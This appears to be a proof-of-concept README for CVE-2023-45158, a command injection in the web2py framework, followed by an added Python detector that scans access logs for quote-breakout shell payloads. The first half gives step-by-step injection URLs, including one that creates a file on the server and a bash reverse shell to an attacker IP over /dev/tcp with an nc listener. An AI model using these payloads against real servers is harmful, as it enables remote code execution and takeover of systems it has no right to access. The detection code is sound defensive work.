play0000/CVE-2023-45158

 
 

CVE-2023-45158

Steps

  1. Run the webserver

     cd web2py
     python3 web2py.py

  2. Inject your command using the URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Replace <IP-ADDRESS> and <YOUR-COMMAND> with your values.

Examples

  1. Create a file on the server

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  2. Reverse shell

On the attacker's machine, run nc -l 127.0.0.1 8080

Go to URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Replace <ATTACKER-IP>.
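
A detection-side view of the requests above, as an added example that is not part of the original repository: it URL-decodes every query parameter found in access-log lines and flags values where a single quote is directly followed by a shell control operator, which is the shape of `%27%3B...%3B%27`. The log lines, their format, and the function name `find_quote_breakouts` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in common log format (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /hack?msg=hello%20world HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /hack?msg=%27%3Btouch%20hack%3B%27 HTTP/1.1" 200 12',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /hack?msg=it%27s%20fine HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /welcome/default/index HTTP/1.1" 200 512',
]

# Request line inside the quoted field: METHOD, target, protocol version.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# A single quote followed (after optional whitespace) by a shell control
# operator: the quote closes a quoted shell string and the operator starts
# a new command. An apostrophe inside ordinary text does not match.
BREAKOUT_RE = re.compile(r"'\s*(?:[;|&`\n]|\$\()")


def find_quote_breakouts(lines):
    """Return (client, parameter, decoded value) for each suspicious parameter."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        client = line.split(" ", 1)[0]
        query = urlsplit(match.group(1)).query
        # parse_qs percent-decodes values, so %27%3B is compared as ';
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if BREAKOUT_RE.search(value):
                    hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    for client, name, value in find_quote_breakouts(SAMPLE_LOG):
        print(f"ALERT client={client} param={name} decoded={value!r}")
```

Matching on the decoded value rather than the raw URL keeps the rule from being tied to one particular encoding of the quote and semicolon.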
